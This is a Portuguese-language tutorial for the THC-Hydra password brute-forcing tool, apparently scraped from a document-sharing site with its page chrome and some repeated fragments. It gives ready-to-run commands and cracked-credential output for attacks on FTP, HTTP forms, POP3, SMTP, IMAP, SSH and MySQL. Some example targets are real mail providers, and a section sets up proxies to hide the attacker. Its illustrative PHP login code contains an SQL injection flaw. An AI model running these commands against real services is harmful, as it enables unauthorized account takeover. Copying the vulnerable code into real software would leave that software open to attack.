THC Hydra Ver 2.1 Tutorial

1 de 10
[Portuguese] Tutorial Thc-Hydra ver 2.1

_
_
_
_
| |_| |__
___
| |__ _
_ __| |_ __ __ _
| __| '_ \ / __|____| '_ \| | | |/ _` | '__/ _` |
| |_| | | | (_|_____| | | | |_| | (_| | | | (_| |
\__|_| |_|\___|
|_| |_|\__, |\__,_|_| \__,_|
|___/
TUTORIAL BSICO THC-HYDRA [PT-BR] ver 2.1 (Rev)
________________________________________________________________________________
Dom 27 Mai 2012 19:45:17 BRT - Por : MDH3LL
- Contato
: mdh3ll@gmail.com
- Data
: Dom 21 Maio 2012
- Tutorial Ver
: 2.1
________________________________________________________________________________
********************************************************************************
Leia com Ateno!
No me responsabilizo pelo uso que voc leitor ou qualquer outra pessoa venha
a fazer com o conhecimento adquirido nesse tutorial.
O tutorial foi escrito exclusivamente com o intuito de ajudar pessoas
que no dominam idiomas estrangeiros e tem dificuldade de entender
sobre o funcionamento do THC-Hydra.
Preserve os crditos.
********************************************************************************
INDICE :
________________________________________________________________________________
[0x00] - Sobre THC-Hydra.
[0x01] - Compilando THC-HYDRA no Linux.
+ Bibliotecas suplementares.
+ Conhecendo o PW-Inspector sem muitos detalhes.
+ Tratando wordlist sem usar o PW-Inspector.
+ Executando Hydra.
[0x02] - Opes Hydra.
[0x03] - Exemplos Hydra.
+ Exemplo FTP
+ Exemplo http-head
+ Exemplo http-post-form
+ Exemplo http-get-form
+ Exemplo POP3
+ Exemplo SMTP
+ Exemplo IMAP
+ Exemplo SSH
+ Exemplo MYSQL
[0x04] - Proxy.
________________________________________________________________________________
################################################################################
[0x00] Sobre THC-Hydra
################################################################################
* THC-Hydra: Open Source/Multiplataforma/

* Desenvolvido por uma organizao Alem chamada "The Hacker's Choice"(THC).
* O Programa pode ser adquirido gratuitamente no site oficial do projeto : http://www.thc.org/thc-hydra/
Hydra usa um mecanismo de FORA BRUTA/BRUTE FORCE (ou busca exaustiva):
Este tipo de ataque consiste em fazer o programa trabalhar exaustivamente
tentando combinaes de senhas e nomes de usurios at chegar
ao seu objetivo obvio.
Servios suportados (v 7.1) :
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,
HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET,
HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP,
MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere,
PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2),
Telnet, VMware-Auth, VNC and XMPP.
################################################################################
2 de 10
[0x01] Compilando THC-HYDRA no Linux :
################################################################################
baixar source, descompacta , entra no diretrio criado :
-------------------------------------------------------------------------------$ wget http://www.thc.org/releases/hydra-7.1-src.tar.gz
$ tar -vzxf hydra-7.1-src.tar.gz
$ cd hydra-7.1-src/
-------------------------------------------------------------------------------Configuraes opcionais :
--disable-xhydra no compila o xhydra (hydra GUI)
--prefix=/opt/hydra diz onde vai ser instalado o hydra.
-------------------------------------------------------------------------------$ ./configure --disable-xhydra --prefix=/opt/hydra
-------------------------------------------------------------------------------compila, instala e cria link simblico :
-------------------------------------------------------------------------------# make && make install && ln -s /opt/hydra/hydra /usr/bin
-------------------------------------------------------------------------------Caso queira usar o pw-inspector criar um link simblico pra ele tambm :
-------------------------------------------------------------------------------# ln -s /opt/hydra/pw-inspector /usr/bin
--------------------------------------------------------------------------------
================================================================================
Bibliotecas suplementares THC-HYDRA no Linux :
================================================================================
Para usar mdulos como (ssh / mysql) preciso instalar bibliotecas suplementares.
Para o modulo mysql possvel instalar direto dos repositrios de qualquer
Debian-like.
-------------------------------------------------------------------------------# apt-get install libmysqlclient-dev
-------------------------------------------------------------------------------Para o modulo ssh segue os passos que usei no debian 6.
-------------------------------------------------------------------------------# apt-get install cmake openssl zlib build-essential
$ wget http://www.libssh.org/files/0.4/libssh-0.4.0.tar.gz
$ tar -vzxf libssh-0.4.0.tar.gz && cd libssh-0.4.0
$ mkdir build && cd build
$ cmake -DWITH_SSH1=ON -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=/usr ..
# make && make install
-------------------------------------------------------------------------------Depois basta compilar o hydra novamente :
-------------------------------------------------------------------------------$ wget http://www.thc.org/releases/hydra-7.1-src.tar.gz
$ tar -vzxf hydra-7.1-src.tar.gz
$ cd hydra-7.1-src/
$ ./configure --disable-xhydra --prefix=/opt/hydra
# make && make install
--------------------------------------------------------------------------------
================================================================================
PW-Inspector :
================================================================================
PW-Inspector um utilitrio que vem ao pacote Hydra e serve exclusivamente pra
tratar wordlists conforme os paramentos passados.
opes do 'pw-inspector' :
********************************************************************************
Options:
-i FILE
file to read passwords from (default: stdin)
-o FILE
file to write valid passwords to (default: stdout)
-m MINLEN minimum length of a valid password
-M MAXLEN maximum length of a valid password
-c MINSETS the minimum number of sets required (default: all given)
Sets:
-l
lowcase characters (a,b,c,d, etc.)
-u
upcase characters (A,B,C,D, etc.)
-n
numbers (1,2,3,4, etc.)
-p
printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
3 de 10
-s
special characters - all others not withint the sets above
********************************************************************************
Segue as opes :
-i
-o
-m
-M
-c
FILE nome da wordlist pra ser tratada (default: stdin).

FILE nome para o arquivo sada com o contedo j tratado (default: stdout).
Tamanho minimo da senha.
Tamanho mximo da senha.
MINISETS nmero minimo de sets necessrios.
Sets:
-l Caracteres minsculos (a,b,c,d, etc.)
-u Caracteres maisculos (A,B,C,D, etc.)
-n Nmeros (1,2,3,4, etc.)
-p Aqui so os caracteres que no se encaixam -l/-u/-n em so eles $,!,/,(,*, etc.)
-s Caracteres especiais - so todos que no encaixam em nenhum dos sets acima.
Exemplos :
Criar wordlist suja para o teste :
-------------------------------------------------------------------------------$ perl -le 'print map { ("a".."z", "A".."Z", 0..9)[rand 62] } 1..rand 10 for 1..100000' >> wordlist_suja.txt
-------------------------------------------------------------------------------Usando o pw-inspector pra filtrar a wordlist "suja" e redirecionar para um novo arquivo apenas
as senhas que possuam o comprimento >= 6 && comprimento <= 8.
-------------------------------------------------------------------------------$ pw-inspector -i wordlist_suja.txt -o wordlist_limpa.txt -m 6 -M 8
-------------------------------------------------------------------------------Redirecionando sada padro (stdout) para o sor ordenar.
-------------------------------------------------------------------------------$ pw-inspector -i wordlist_suja.txt -m 6 -M 8 | sort >> wordlist_limpa_sort.txt
-------------------------------------------------------------------------------Redirecionando contedo ordenado para a entrada padro (stdin) :
-------------------------------------------------------------------------------$ sort wordlist_suja.txt | pw-inspector -m 6 -M 8 >> wordlist_limpa_sort.txt
-------------------------------------------------------------------------------Para o prximo caso no sera possvel pegar nada se a wordlist_suja.txt foi criada
o script disponibilizado neste tutorial porque obriguei o pw-inspector a pegar
apenas as senhas que contenham os 2 sets
(nmeros e caracteres especiais que definitivamente no existe na wordlist).
-------------------------------------------------------------------------------$ sort wordlist_suja.txt | pw-inspector -m 4 -M 4 -c 2 -n -s
-------------------------------------------------------------------------------Se o nmero minimo fosse setado pra 1 pegaria as senhas que contenham o "set" -n (nmeros).
================================================================================
Tratando wordlist sem usar o PW-Inspector.
================================================================================
Particularmente prefiro tratar as wordlists sem usar o pw-inspector que no
atende as minhas necessidades.
Os exemplos abaixo usam comandos simples que qualquer usurio Linux deveria conhecer.
Juntando wordlists :
-------------------------------------------------------------------------------cat wordlist_1.txt wordlist_2.txt wordlist_3.txt >> wordlist_final.txt
-------------------------------------------------------------------------------Ordenando e removendo senhas duplicadas :
-------------------------------------------------------------------------------$ sort wordlist_suja.txt | uniq -u
-------------------------------------------------------------------------------Pegando senhas com o comprimento 2 a 4 contento apenas nmeros :
-------------------------------------------------------------------------------$ sort wordlist_suja.txt | grep -P "^[0-9]{6,8}$"
-------------------------------------------------------------------------------Pegando senhas [a-z0-9] com apenas 6 caracteres :
-------------------------------------------------------------------------------$ sort wordlist_suja.txt | grep -P "^[a-z0-9]{6}$"
-------------------------------------------------------------------------------Pegando senhas [a-zA-Z] com qualquer comprimento,removendo senhas duplicadas e
4 de 10
jogando o contedo para um novo arquivo chamado "wordlist_mdh3ll.txt"
-------------------------------------------------------------------------------$ sort wordlist_suja.txt | grep -P "^[a-zA-Z]*$" | uniq -u >> wordlist_mdh3ll.txt
ou
$ sort wordlist_suja.txt | grep -Pi "^[a-z]*$" | uniq -u >> wordlist_mdh3ll.txt
-------------------------------------------------------------------------------Pegando senhas que comece com "1" e termine com "w".
-------------------------------------------------------------------------------$ cat wordlist_suja.txt | grep -P "^1.*w$"
-------------------------------------------------------------------------------Convertendo caracteres maisculos para minsculos.
-------------------------------------------------------------------------------$ cat wordlist_suja.txt | tr '[:upper:]' '[:lower:]' >> wordlist_minusculo.txt
ou
$ perl -ne 'print lc $_' wordlist_suja.txt
-------------------------------------------------------------------------------================================================================================
Executando Hydra :
================================================================================
Rode 'hydra' no terminal:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE]
[-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT]
[-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]
Options:
-R
restore a previous aborted/crashed session
-S
perform an SSL connect
-s PORT
if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e ns
additional checks, "n" for null password, "s" try login as pass
-u
loop around users, not passwords (implied when using -x)
-C FILE
colon separated "login:pass" format, instead of -L/-P options
-M FILE
server list for parallel attacks, one entry per line
-o FILE
write found login/password pairs to FILE instead of stdout
-f
exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6
prefer IPv4 (default) or IPv6 addresses
-v / -V
verbose mode / show login+pass combination for each attempt
-U
service module usage details
server
the target server (use either this OR the -M option)
service
the service to crack. Supported protocols: cisco cisco-enable cvs ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy
OPT
some service modules need special input (use -U to see module help)
... ...
********************************************************************************
Podemos ver acima que quando executado exibe informaes como sintaxe,opes etc.
################################################################################
[0x02] Opes hydra :
################################################################################
-R
-S
-s
-l
-L
-p
-P
Restaura sesses abordadas/quebradas.

Realiza conexo segura usando SSL caso seja necessrio.
Especifica o nmero da porta usada para estabelecer a conexo.
Especifica "login" da vitima.
Carrega uma lista contendo "logins" de vitimas (1 por linha).
Especifica senha.
Especifica o arquivo contendo as "passwords" (1 por linha).
-x MIN:MAX:CHARSET Gerador de senhas

Opes de gerao :
* MIN - nmero minimo de caracteres gerados.
* MAX - nmero mximo de caracteres gerados.
* CHARSET - especifica os sets de caracteres.
a - letras minusculas.
A - letras maisculas.
1 - nmeros.
5 de 10
para qualquer outro use o caractere pertencente.
Exemplos :
-x 3:5:a
-x 5:8:A
-x 5:8:A1
-x 1:3:/
-x 1:3:/%,.-
Gera
Gera
Gera
Gera
Gera
senha
senha
senha
senha
senha
com
com
com
com
com
o
o
o
o
o
comprimento
comprimento
comprimento
comprimento
comprimento
[3-5]
[5-8]
[5-8]
[1-3]
[1-3]
contendo caracteres [a-z].

contendo caracteres [A-Z].
com caracteres [A-Z0-9]
contendo apenas / barra.
contendo / % , . -
-e nsr 'n' testa senha em branco

/
's' testa user como password /
'r' testa senha invertida
-u
-C
-M
-o
-f
-t
-w/-W
-4/-6
-v/-V
-U
No sei como funciona.

Usado pra carregar um arquivo contendo usurio:senha (equivale a -L/-P).
Carrega lista de servidores pra ataque paralelo (1 por linha).
Salva as senhas encontradas no arquivo especificado.
Faz o programa parar de trabalhar quando a senha ou usurio for encontrado.
Limita o nmero de conexes paralelas (default: 16).
Define Tempo mximo pra esperar respostar do servidor (default: 30s).
preferir endereos IPv4 (default) ou endereos IPv6.
Modo [-v]erbose normal / [-V]erbose detalhado.
Detalha do modulo especificado.
Server: Servidor alvo.

Exemplos:
127.0.0.1
localhost
pop.gmail.com
pop.mail.yahoo.com.br
pop3.live.com
Service: servio/modulo/protocolo.
Exemplos:
pop3
ftp
smtp
vnc
imap
http-head
http-post-form
http-get-form
################################################################################
[0x03] Exemplos:
################################################################################
Pratica das opes [0x02] deste tutorial.
================================================================================
Exemplo FTP
================================================================================
Sintaxe:
-------------------------------------------------------------------------------hydra -l root -P pass.txt -w 15 localhost ftp
-------------------------------------------------------------------------------__________________________________________________________
|________________________Terminal____________________|-|_|X|
||
||
|| mdh3ll@debian:~$ ftp
||
|| ftp> o
||
|| (to) localhost
||
|| Connected to localhost.
||
|| 220 ProFTPD 1.3.3d Server (ProFTPD) [::ffff:127.0.0.1] ||
|| Name (localhost:mdh3ll):
||
||
||
||________________________________________________________||
|__________________________________________________________|
Sada:
********************************************************************************
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-11 12:25:52
[DATA] 16 tasks, 1 server, 46 login tries (l:1/p:46), ~2 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1
login: nobody
password: culture123
[STATUS] attack finished for localhost (waiting for children to finish)
6 de 10
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-11 12:25:53
********************************************************************************
Encontrou :
[21][ftp] host: 127.0.0.1
login: nobody
================================================================================
Exemplo http-head
================================================================================
Sintaxe:
-------------------------------------------------------------------------------hydra -L users.txt -P pass.txt -o out.txt localhost http-head /colt/
-------------------------------------------------------------------------------__________________________________________________________
|__Mozilla Firefox___________________________________|-|_|X|
||_http://localhost/colt/________________________________ ||
||
||
||
||
||
__________________________________________
||
||
|__Autenticao solicitada_______________|X|
||
||
|O servidor localhost:80 requer um nome de |
||
||
|usurio e senha.O servidor diz:colt user |
||
||
|
____________________ |
||
||
| nome de usurio: |_______mdh3ll_______| |
||
||
|
Senha: |___**************___| |
||
||
|
__________
_______ |
||
||
|___________________|_cancelar_|_|_login_|_|
||
||
||
||
||
||
||
||
||
||________________________________________________________||
|_Concludo________________________________________________|
Sada:
********************************************************************************
[DATA] attacking service http-head on port 80
[80][www] host: 127.0.0.1
login: lampp
[STATUS] attack finished for localhost (waiting for children to finish)
********************************************************************************
O Hydra encontrou o e salvou no arquivo out.txt :
-------------------------------------------------------------------------------usuario:lampp senha:culture123
--------------------------------------------------------------------------------
================================================================================
Exemplo http-post-form
================================================================================
Sintaxe : <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
cdigo fonte do index.html ilustrativo :
http://127.0.0.1/login/index.html
-------------------------------------------------------------------------------<html>
<head><title>Login</title></head>
<body>
<form method="POST" action="logar.php">
<p> Nome </p></BR>
<input type="text" name="user"></br>
<p> Senha </p></BR>
<input type="password" name="pass"></br>
<input type="submit" name="enviar" value="Enviar">
</form>
</body>
</html>
--------------------------------------------------------------------------------
7 de 10
__________________________________________________________
|__Mozilla Firefox__________Login____________________|-|_|X|
||_http://127.0.0.1/login/index.html______________________ |
||
||
||
Nome
||
||
_____________________________________
||
||
|
|
||
||
|_____________________________________|
||
||
||
||
Senha
||
||
_____________________________________
||
||
|
|
||
||
|_____________________________________|
||
||
||
||
________________
||
||
|
Enviar
|
||
||
|________________|
||
||
||
||________________________________________________________||
|_Concludo________________________________________________|
logar.php ilustrativo :
-------------------------------------------------------------------------------<?
# logar.php ilustrativo
$user = $_POST['user'];
$pass = $_POST['pass'];
if($user == "admin" && $pass == "culture123"){
echo "Logado com sucesso!";
}else{
echo "Usuario ou senha invalida!";
}
?>
--------------------------------------------------------------------------------
Sintaxe simples fica assim :

-------------------------------------------------------------------------------hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-post-form "/login/logar.php:user=ÛSER^&pass=^PASS^:Usuario ou senha invalida
-------------------------------------------------------------------------------Para criar esta sintaxe foi preciso :
Valor do atributo action do <form> : logar.php
Valor do atributo referente ao nome e senha de usurio nas tags <input> dentro do <form>: name , pass
Mensagem de erro ou parte dela: "Usurio ou senha invalida"
- O uso do caractere coringa permitido : .*senha invalida
- possvel usar uma mensagem de sucesso adicionando S= antes da mensagem :
-------------------------------------------------------------------------------hydra -l admin -P pass.txt -o out.txt -t 1 -f -w 15 127.0.0.1 http-post-form "/login/logar.php:user=ÛSER^&pass=^PASS^:S=Logado com sucess

--------------------------------------------------------------------------------
Sada:
********************************************************************************
[DATA] 1 task, 1 server, 47 login tries (l:1/p:47), ~47 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1
login: admin
[STATUS] attack finished for 127.0.0.1 (valid pair found)
********************************************************************************
Para obter mais detalhes execute : ./hydra -U http-post-form
================================================================================
Exemplo http-get-form
================================================================================
http-get-form vai seguir o mesmo modelo do http-post-form
-------------------------------------------------------------------------------# index.html ilustrativo (http://127.0.0.1/index.html)
<html>
8 de 10
<head><title>Login</title></head>
<body>
<form method="GET" action="enviar.php">
<p> Nome </p></BR>
<input type="text" name="tx_nome"></br>
<p> Senha </p></BR>
<input type="password" name="tx_senha"></br>
<input type="submit" name="go" value="Go">
</form>
</body>
</html>
--------------------------------------------------------------------------------------------------------------------------------------------------------------# enviar.php ilustrativo (http://127.0.0.1/enviar.php)
<?php
# eviar.php ilustrativo
require_once('conectar.php');
$user = $_GET['tx_nome'];
$pass = $_GET['tx_senha'];
$pass = md5($pass);
$pesquisa = MYSQL_QUERY("select usuario,senha from TBLogin where usuario = \"$user\" AND senha = \"$pass\"");
$resultado = mysql_num_rows($pesquisa);
if($resultado == 1){
echo "Logado com sucesso";
}else{
echo "Algo esta errado";
}
?>
-------------------------------------------------------------------------------Sintaxe completa fica assim :
-------------------------------------------------------------------------------hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-get-form "enviar.php:user=ÛSER^&pass=^PASS^:Algo esta errado"
----------------------------------------------------------------------------------A nica mudana significativa a troca do modulo "http-post-form" por "http-get-form"
na sintaxe.
Para obter mais detalhes execute : ./hydra -U http-get-form
================================================================================
Exemplo POP3
================================================================================
Sintaxe:
-------------------------------------------------------------------------------hydra -L users.txt -p 123456 -S pop3.dominio.com pop3
-------------------------------------------------------------------------------Sada:
********************************************************************************
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:55:28
[DATA] 9 tasks, 1 servers, 9 login tries (l:9/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop3.xxx.com (waiting for childs to finish)
[110][pop3] host: pop3.dominio.com
login: user@dominio.com.br password: 123456
********************************************************************************
================================================================================
Exemplo SMTP
================================================================================
Sintaxe :
-------------------------------------------------------------------------------hydra -l admin@dominio.com -P pass.txt smtp.mail.dominio.com smtp
-------------------------------------------------------------------------------Sada:
********************************************************************************
[DATA] 4 tasks, 1 server, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking service smtp on port 25
[25][smtp] host: xxx.xxx.xxx.xxx
login: admin@dominio.com
password: cabal12ea13
********************************************************************************
9 de 10
================================================================================
Exemplo IMAP
================================================================================
Sintaxe :
-------------------------------------------------------------------------------hydra -l nobody@dominio.com -P pass.txt -S imap.dominio.com imap
-------------------------------------------------------------------------------Sada:
********************************************************************************
[DATA] 5 tasks, 1 server, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking service imap on port 993
[993][imap] host: xx.xxx.xx.xxx
login: nobody@dominio.com
password: love1234
[STATUS] attack finished for imap.dominio.com (waiting for children to finish)
********************************************************************************
================================================================================
Exemplo SSH
================================================================================
__________________________________________________________
|________________________Terminal____________________|-|_|X|
||
||
||mdh3ll@debian:~$ ssh teste@192.168.1.4
||
||The authenticity of host '192.168.1.4 (192.168.1.4)'\
||
|| can't be established.
||
||RSA key fingerprint is xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx ||
||Are you sure you want to continue\
||
|| connecting (yes/no)? yes
||
||Warning: Permanently added '192.168.1.4' (RSA)\
||
|| to the list of known hosts.
||
||teste@192.168.1.4's password:
||
||________________________________________________________||
|__________________________________________________________|
Sintaxe :
-------------------------------------------------------------------------------hydra -l teste -x 6:6:1 -s 22 192.168.1.4 ssh
-------------------------------------------------------------------------------Sada :
********************************************************************************
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.4
login: teste
password: 000138
[STATUS] attack finished for 192.168.1.4 (waiting for children to finish)
********************************************************************************
================================================================================
Exemplo MYSQL
================================================================================
Sintaxe :
-------------------------------------------------------------------------------hydra -l root -P pass.txt -t 4 127.0.0.1 mysql
-------------------------------------------------------------------------------********************************************************************************
[DATA] 4 tasks, 1 servers, 32 login tries (l:1/p:32), ~8 tries per task
[DATA] attacking service mysql on port 3306
[3306][mysql] host: 127.0.0.1
login: root
password: Password01
[STATUS] attack finished for 127.0.0.1 (waiting for childs to finish)
********************************************************************************
################################################################################
[0x04] Proxy:
################################################################################
10 de 10
Proxy web:
O uso de proxy no hydra se limita em definir uma nova varivel de ambiente
com nome relacionado ao contedo.
Proxy HTTP :
-------------------------------------------------------------------------------HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
-------------------------------------------------------------------------------Para qualquer outro use : HYDRA_PROXY_CONNECT
-------------------------------------------------------------------------------HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
-------------------------------------------------------------------------------Com autentificao :
-------------------------------------------------------------------------------HYDRA_PROXY_AUTH="nome:senha"
-------------------------------------------------------------------------------pra saber se o proxy foi definido use echo $VARIAVEL_DEFINIDA no terminal :
-------------------------------------------------------------------------------$ echo HYDRA_PROXY_HTTP
$ echo HYDRA_PROXY_CONNECT
$ echo HYDRA_PROXY_AUTH
-------------------------------------------------------------------------------a sada deve retornar o contedo que voc definiu na varivel.
(Preserve os crditos do autor)
Offensive Security 2011

THC Hydra Ver 2.1 Tutorial

Încărcat de

Informații document

Titlu original

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

THC Hydra Ver 2.1 Tutorial

Încărcat de

Drepturi de autor:

Formate disponibile

1 de 10

[Portuguese] Tutorial Thc-Hydra ver 2.1

* THC-Hydra: Open Source/Multiplataforma/

FILE nome da wordlist pra ser tratada (default: stdin).

Restaura sesses abordadas/quebradas.

-x MIN:MAX:CHARSET Gerador de senhas

contendo caracteres [a-z].

-e nsr 'n' testa senha em branco

No sei como funciona.

Server: Servidor alvo.

cdigo fonte do index.html ilustrativo :

Sintaxe simples fica assim :

-------------------------------------------------------------------------------hydra -l admin -P pass.txt -o out.txt -t 1 -f -w 15 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:S=Logado com sucess

Offensive Security 2011

S-ar putea să vă placă și